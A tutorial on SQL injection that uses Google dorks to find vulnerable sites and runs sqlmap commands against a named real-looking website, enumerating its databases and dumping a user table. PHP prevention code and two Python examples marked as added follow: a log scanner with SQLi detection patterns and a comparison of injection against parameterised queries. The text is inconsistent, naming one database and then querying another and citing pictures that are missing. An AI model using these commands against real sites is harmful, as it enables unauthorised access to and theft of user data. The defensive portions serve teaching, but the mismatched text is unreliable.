
WEB APPLICATION PENETRATION TESTING: USING SQL INJECTION

SQL injection is an application security weakness that allows attackers to control an application's database, letting them access or delete data, change an application's data-driven behaviour, and do other undesirable things, by tricking the application into sending unexpected SQL commands. SQL injection weaknesses occur when an application uses untrusted data, such as data entered into web form fields, as part of a database query. When an application fails to properly sanitize this untrusted data before adding it to a SQL query, an attacker can include their own SQL commands, which the database will execute. Such SQLi vulnerabilities are easy to prevent, yet SQLi remains a leading web application risk, and many organizations remain vulnerable to potentially damaging data breaches resulting from SQL injection.

SQL injection is a code injection technique used to attack data-driven applications. A SQL injection attack allows external users to read details from the database, so attackers can dump a whole website database and find admin username/password details.

Note: Unfortunately we CANNOT PERFORM an SQLi attack on all websites. The website needs an SQLi vulnerability for this technique to work. A website URL such as www.example.com/page.php? needs a parameter like php?id=4 / php?id=any number to inject into.
TOOLS USED

- Sqlmap
- Kali Linux operating system
- Target website URL: http://www.ffo.org.pk/gallery.php?c=10
- To find this type of website, use Google Dorks. A dork is an advanced search on Google.
- There is no limit to the dork list; you can make your own Google dork with keywords, or search Google for "New Google Dorks List" and you will get many results.
- Note: You can search other countries' websites too using Google dorks. If you would like to do this for Pakistan-based websites, add site:.pk at the end of the dork, for example:
- I found a website http://www.ffo.org.pk/gallery.php?c=10

PERFORMING SQL INJECTION ATTACK

- Open the terminal in the Kali Linux operating system.
- Type the command sqlmap.
- To test for this, we use sqlmap. To look at the set of parameters that can be passed, type in the terminal:

    sqlmap -h

Using sqlmap to test a website for SQL injection vulnerability:

STEP 1: List information about the target web app database

So firstly, we have to enter the target URL that we want to check along with the -u parameter. Now typically, we would want to test whether it is possible to gain access to a database. So we use the --dbs option to do so. --dbs lists all the available databases.

    sqlmap -u "http://www.ffo.org.pk/gallery.php?c=10" --dbs

We observe that there are two databases, acuart and information_schema.

STEP 2: List information about tables present in a particular database

To try and access any of the databases, we have to slightly modify our command. We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we would want to see whether we can access the tables. For this, we use the --tables option. Let us access the acuart database.

    sqlmap -u "http://www.ffo.org.pk/gallery.php?c=10" -D generic2_ffoweb --tables

In the above picture, we see that 24 tables have been retrieved. So now we definitely know that the website is vulnerable.

STEP 3: List information about the columns of a particular table

If we want to view the columns of a particular table, we can use the following command, in which we use -T to specify the table name and --columns to query the column names. We will try to access the table tblusers.

    sqlmap -u "http://www.ffo.org.pk/gallery.php?c=10" -D generic2_ffoweb -T tblusers --columns

STEP 4: Dump the data from the columns

Similarly, we can access the information in a specific column by using the following command, where the --dump option retrieves the data.

    sqlmap -u "http://www.ffo.org.pk/gallery.php?c=10" -D generic2_ffoweb -T tblusers --dump

From the above picture, we can see that we have accessed the data from the database. Similarly, in such vulnerable websites, we can literally explore through the databases to extract information.
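As the defender's counterpart to the enumeration steps above, here is an added example that is not part of the original document: it scans Apache-style access-log lines for the traces such a run leaves, namely injection syntax in the query string and sqlmap's default User-Agent, which names the tool. The client addresses, log lines and the rule set are constructed for illustration; only the /gallery.php?c= path pattern comes from the text above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-log sample (not real traffic). The path and parameter
# mirror the gallery.php?c= pattern discussed above; the User-Agent follows the shape of
# sqlmap's default, which names the tool unless the operator overrides it.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /gallery.php?c=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:01:05 +0000] "GET /gallery.php?c=10%27 HTTP/1.1" 500 312 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.7 - - [10/Mar/2024:10:01:05 +0000] "GET /gallery.php?c=10%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.7 - - [10/Mar/2024:10:01:06 +0000] "GET /gallery.php?c=10%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 4880 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.4 - - [10/Mar/2024:10:02:00 +0000] "GET /gallery.php?c=11 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# Each rule: (name, pattern applied to the URL-decoded query string). Constructed heuristics.
QUERY_RULES = [
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("boolean-tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),
    ("stray-quote", re.compile(r"'")),
]

def analyze(log_text):
    """Return (findings, per_ip): suspicious requests with their reasons, and a count per client IP."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        ip, method, target, status, agent = m.groups()
        path, _, query = target.partition("?")
        decoded = unquote_plus(query)  # decode %27, %20 etc. before matching
        reasons = [name for name, rx in QUERY_RULES if rx.search(decoded)]
        if "sqlmap" in agent.lower():
            reasons.append("sqlmap-user-agent")
        if reasons:
            findings.append({"ip": ip, "path": path, "query": decoded, "status": status, "reasons": reasons})
            per_ip[ip] += 1
    return findings, per_ip

if __name__ == "__main__":
    found, counts = analyze(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["path"], repr(f["query"]), f["status"], ", ".join(f["reasons"]))
    print("suspicious requests per IP:", dict(counts))
```

A burst of flagged requests against one parameter from one address, as in the sample, is the pattern to alert on; a single stray quote from a human typo is not.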

SQL INJECTION PREVENTION

There are four ways to prevent SQL injection:

1. Using prepared statements

The easiest way to prevent SQL injection attacks in PHP is to use prepared statements. So, here is how we can use prepared statements for making the above database query.

<?php
// $mysqli is assumed to be an open mysqli connection created elsewhere.
$username = $_POST["username"];
$password = $_POST["password"];
// The ? placeholders mark where the user-supplied values go; the query text itself is fixed.
$stmt = $mysqli->prepare("SELECT * FROM login WHERE user=? AND pass=?");
// bind_param() sends the values separately from the SQL, so they can never change its structure.
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
$result = $stmt->get_result();
$row = $result->fetch_assoc(); // null when no matching user exists
$stmt->close();
$mysqli->close();
?>

What happens is that the SQL statement you pass to prepare is parsed and compiled by the database server. By specifying parameters (either a ? or a named parameter like :username in the case of PDO) you tell the database engine where you want to filter on. Then, when you call execute, the prepared statement is combined with the parameter values you specify.

2. Escaping strings

Escaping strings neutralises the special characters in a value before it is used in a SQL statement. It also takes into account the current charset of the connection.

<?php
// $conn is assumed to be an open mysqli connection created elsewhere.
$username = mysqli_real_escape_string($conn, $_POST["username"]);
$password = mysqli_real_escape_string($conn, $_POST["password"]);
// The escaped values must be placed inside quotes in the SQL text; escaping does not protect an unquoted value.
$result = mysqli_query($conn, "SELECT * FROM login WHERE user='$username' AND pass='$password'");
mysqli_close($conn);
?>

3. Using trim() and strip_tags()

trim() and strip_tags() are the conventional ways of filtering your input. trim() is used for removing whitespace from the beginning and end of a string. strip_tags() is used for stripping HTML and PHP tags. Both of them together can help in removing additional code and spaces generally used by hackers. Note that neither function touches SQL metacharacters such as quotes, so this is input hygiene that belongs alongside a prepared statement rather than in place of one. Here is how you can have code like this:

<?php
$username = strip_tags(trim($_POST["username"]));
$password = strip_tags(trim($_POST["password"]));
?>
4. Using PDO

PDO, or PHP Data Objects, is very useful, probably the most effective in preventing SQL injection attacks. PDO also uses prepared statements and binds values at runtime. For PDO, you can have code like this:

<?php
// db::con() is assumed to be an application helper that returns an open PDO connection.
$stmt = db::con()->prepare("SELECT * FROM table WHERE id=? AND name=?");
// Each value is bound with an explicit type, so the SQL text never changes.
$stmt->bindValue(1, $id, PDO::PARAM_INT);
$stmt->bindValue(2, $name, PDO::PARAM_STR);
$stmt->execute();
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
?>
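To show why methods 2 and 3 above are weaker than methods 1 and 4, here is an added example that is not part of the original document: a Python/SQLite stand-in for the gallery.php?c= lookup, with the same tautology input run through plain concatenation, escaping (unquoted and quoted), strip_tags()/trim() filtering and a bound parameter. escape_string and strip_tags_trim are simplified stand-ins for the PHP functions, and the table contents are constructed.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the page's gallery table, keyed by a numeric id as in gallery.php?c=10.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE gallery (c INTEGER PRIMARY KEY, title TEXT)")
conn.executemany("INSERT INTO gallery VALUES (?, ?)",
                 [(9, "public album"), (10, "requested album"), (11, "private album")])

def escape_string(value):
    """Stand-in for mysqli_real_escape_string (SQL-standard quote doubling; the lesson is the same)."""
    return value.replace("'", "''")

def strip_tags_trim(value):
    """Stand-in for strip_tags(trim(...)): drops HTML-like tags and surrounding whitespace."""
    return re.sub(r"<[^>]*>", "", value).strip()

def query_concat(c):
    # What the tutorial exploits: untrusted input pasted straight into the SQL text.
    return conn.execute("SELECT title FROM gallery WHERE c=" + c).fetchall()

def query_escaped_unquoted(c):
    # Method 2 on a numeric parameter: escaping only matters inside quotes, so this stays injectable.
    return conn.execute("SELECT title FROM gallery WHERE c=" + escape_string(c)).fetchall()

def query_escaped_quoted(c):
    # Method 2 done right: the escaped value sits inside quotes, so the engine reads one string value.
    return conn.execute("SELECT title FROM gallery WHERE c='" + escape_string(c) + "'").fetchall()

def query_stripped(c):
    # Method 3: trim()/strip_tags() remove HTML, not SQL syntax, so this is no better than concatenation.
    return conn.execute("SELECT title FROM gallery WHERE c=" + strip_tags_trim(c)).fetchall()

def query_parameterized(c):
    # Methods 1 and 4: the value is bound to a placeholder and compared as data, never parsed as SQL.
    return conn.execute("SELECT title FROM gallery WHERE c=?", (c,)).fetchall()

PAYLOAD = "10 OR 1=1"  # constructed tautology input in place of the legitimate value "10"

def compare(value):
    """Row counts each query style returns for one input: 1 is correct, 3 means the WHERE clause was bypassed."""
    return {
        "concat": len(query_concat(value)),
        "escaped_unquoted": len(query_escaped_unquoted(value)),
        "escaped_quoted": len(query_escaped_quoted(value)),
        "strip_tags_trim": len(query_stripped(value)),
        "parameterized": len(query_parameterized(value)),
    }

if __name__ == "__main__":
    print("legitimate input:", compare("10"))
    print("tautology input :", compare(PAYLOAD))
```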
